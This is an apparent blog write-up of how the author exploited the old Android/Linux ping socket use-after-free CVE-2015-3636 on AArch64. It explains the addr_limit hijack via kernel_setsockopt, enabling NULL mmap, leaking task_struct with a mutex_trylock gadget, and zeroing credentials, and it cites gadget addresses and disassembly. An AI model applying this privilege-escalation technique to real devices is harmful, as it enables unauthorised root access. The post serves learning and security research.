For a newbie like me, it’s quite hard to do it all by myself (constructing a ROP chain, bypassing PXN, leaking task_struct…). Thus, I just want to understand and modify others’ code for a successful exploitation. Because CVE-2015-3636 is a famous and old bug, you can find many resources for this.

We simply borrow others’ code, like below.

Hijacking addr_limit

The trick here was proposed in 2016 and goes through the function int kernel_setsockopt().

int kernel_setsockopt(struct socket *sock, int level, int optname,
			char *optval, unsigned int optlen)
{
	mm_segment_t oldfs = get_fs();
	char __user *uoptval;
	int err;

	uoptval = (char __user __force *) optval;

	set_fs(KERNEL_DS);
	if (level == SOL_SOCKET)
		err = sock_setsockopt(sock, level, optname, uoptval, optlen);
	else
		err = sock->ops->setsockopt(sock, level, optname, uoptval,
					    optlen);
	set_fs(oldfs);
	return err;
}

In this function, the kernel first saves the current mm_segment_t to oldfs and updates it to KERNEL_DS, which is 0xffffffffffffffff here, giving the current thread the ability to read and write kernel-space memory. After sock_setsockopt finishes, oldfs is restored. As we can hijack the pc to construct a ROP chain, we can

  1. redirect sk->sk_prot->close(sk, timeout); to kernel_setsockopt.
  2. construct a fake ops in the sock so that sock->ops->setsockopt jumps somewhere else and escapes the set_fs(oldfs);.

When it comes to the details, I picked out the assembly code below as well as some values learnt from debugging.

kernel_setsockopt
.text:FFFFFFC0003443CC                 STP             X29, X30, [SP,#-0x20+var_s0]!
.text:FFFFFFC0003443D0                 CMP             W1, #1
.text:FFFFFFC0003443D4                 MOV             X5, SP
.text:FFFFFFC0003443D8                 MOV             X29, SP
.text:FFFFFFC0003443DC                 STP             X19, X20, [SP,#var_s10]
.text:FFFFFFC0003443E0                 AND             X19, X5, #0xFFFFFFFFFFFFC000
.text:FFFFFFC0003443E4                 MOV             X5, #0xFFFFFFFFFFFFFFFF
.text:FFFFFFC0003443E8                 LDR             X20, [X19,#8]
.text:FFFFFFC0003443EC                 STR             X5, [X19,#8]
.text:FFFFFFC0003443F0                 B.EQ            loc_FFFFFFC000344410
.text:FFFFFFC0003443F4                 LDR             X5, [sock,#0x28]
.text:FFFFFFC0003443F8                 LDR             X5, [X5,#0x68]
.text:FFFFFFC0003443FC                 BLR             X5 		# break points here
.text:FFFFFFC000344400                 STR             oldfs, [X19,#8]
.text:FFFFFFC000344404                 LDP             X19, oldfs, [SP,#var_s10]
.text:FFFFFFC000344408                 LDP             X29, X30, [SP+var_s0],#0x20
.text:FFFFFFC00034440C                 RET

When the chain reaches 0xFFFFFFC0003443FC, the X20 register holds the oldfs variable, whose value is 0x8000000000. At this point, [SP] and [SP+0x8] store the old values of X29 and X30, and [SP+0x10] and [SP+0x18] store the old values of X19 and X20. We don’t have to care much about these details; the compiler saves them because the calling convention requires it.

The called routine is expected to preserve r19-r28. link

By doing this, the control flow skips the code at 0xFFFFFFC000344400 that restores oldfs, with no other side effect. (Remember that on a RISC architecture like this one, the return address is not automatically saved on the stack!)

All in all, after the addr_limit is maliciously enlarged, we obtain an arbitrary read & write primitive through pipe read & write. (For now just remember this; a post discussing pipes will be released in the near future ;D)
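Why a stale KERNEL_DS matters can be seen with a simplified model of the range check that guards user-memory accesses. This is a sketch, not the kernel’s actual macro: the model_* names are hypothetical, and the two limits are simply the values quoted in this post.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define MODEL_USER_DS   0x8000000000ULL		/* oldfs value seen in the debugger */
#define MODEL_KERNEL_DS 0xffffffffffffffffULL	/* value written by set_fs(KERNEL_DS) */

/* Simplified stand-in for the user-access range check: accept
 * [addr, addr + size) only if it ends at or below addr_limit. */
bool model_range_ok(uint64_t addr, uint64_t size, uint64_t addr_limit)
{
	return addr <= addr_limit && size <= addr_limit - addr;
}
```

With the normal limit, a kernel address such as 0xffffffc0003443cc is rejected; once addr_limit stays at KERNEL_DS, the same address passes the check, so ordinary read and write system calls can be pointed at kernel memory.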

Enable mmap NULL address

Being able to mmap at the NULL address helps the subsequent mission (leaking task_struct). To do so, we can use the arbitrary write primitive to overwrite the variable mmap_min_addr in the kernel data section.

Leaking task_struct

Cool, we can write to any place we want, and we can (to some extent) hijack the control flow when closing a vulnerable socket. The direct idea for privilege escalation is to overwrite the real_cred struct of the current task_struct. Once we leak the address of this target, we can easily modify its values.

How to do that?

An interesting finding from building the arbitrary read & write primitive can be discussed now. Let’s look into set_fs and get_fs.

#define get_fs()	(current_thread_info()->addr_limit)

static inline void set_fs(mm_segment_t fs)
{
	current_thread_info()->addr_limit = fs;
}

We see that both get_fs and set_fs go through current_thread_info. How is that implemented?

static inline struct thread_info *current_thread_info(void)
{
	register unsigned long sp asm ("sp");
	return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}

Isn’t that amazing? To obtain the current thread_info, all you have to do is AND the current stack pointer with 0xFFFFFFFFFFFFC000. How beautiful the alignment is! Why this weird function can extract the thread_info is answered by the kernel stack design. On AArch64, the kernel stack of each thread is 16 KB, and the corresponding thread_info is located right at its start. Hence, you know why this trick works.
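The masking can be checked against the numbers in the first crash log. The snippet below is a userspace sketch of the same arithmetic; the names are made up for illustration, and the 16 KB stack size is the one stated above.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_THREAD_SIZE 16384ULL	/* 16 KB kernel stack */

/* Same arithmetic as current_thread_info(): clear the low bits of sp. */
uint64_t model_thread_info_base(uint64_t sp)
{
	return sp & ~(MODEL_THREAD_SIZE - 1);
}
```

Feeding in the sp from the first oops, 0xffffffc03db47da0, yields 0xffffffc03db44000, which is exactly the ti value printed in the same log.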

What we do next is find a proper gadget to get the address of thread_info, and from it the address of task_struct. Existing solutions use a gadget in mutex_trylock().

.text:FFFFFFC00045457C                 MOV             X2, SP
.text:FFFFFFC000454580                 AND             X2, X2, #0xFFFFFFFFFFFFC000
.text:FFFFFFC000454584                 LDR             X2, [X2,#0x10]
.text:FFFFFFC000454588                 STR             X2, [X1,#0x18]
.text:FFFFFFC00045458C                 RET

With the help of this gadget, the value at thread_info+0x10, which is the struct task_struct *task pointer, is stored at address X1 + 0x18. Back at the PC hijack position in inet_release(), X1 holds the variable timeout, whose value is 0 in our experiment. That is to say, the address of the current task_struct is stored at virtual address 0x0 + 0x18. (Now you understand why we need to enable mmap at the NULL address.)

The remaining part is quite clear: with the real_cred offset in hand, we can rewrite uid, gid, suid … to zero. In addition, some solutions clear task_struct->files->fdt to avoid an early crash (because a large number of UAF sockets are still around).

The entire code can be found here.

A screenshot of the exploit run: pingpongroot.png

The old CVE-2015-3636 is quite an attractive one. Playing with it teaches you the basics of advanced kernel exploitation, and it can also open the door to Android hacking for you. Through this blog, I hope you now understand the internals of this bug and the way to hijack it.

In addition, if you want to simplify the experiment by using a standard x86 machine, be careful. During my exploration, I found that on the 32-bit architecture, the kmem_cache for ping sock is merged with other caches, which makes heap spraying a lot harder. An AArch64 or x64 machine is preferable.


  1. Pwnie for Best Privilege Escalation Bug, 2015. LINK 

  2. goldfish git repo LINK 

  3. One workable exploit LINK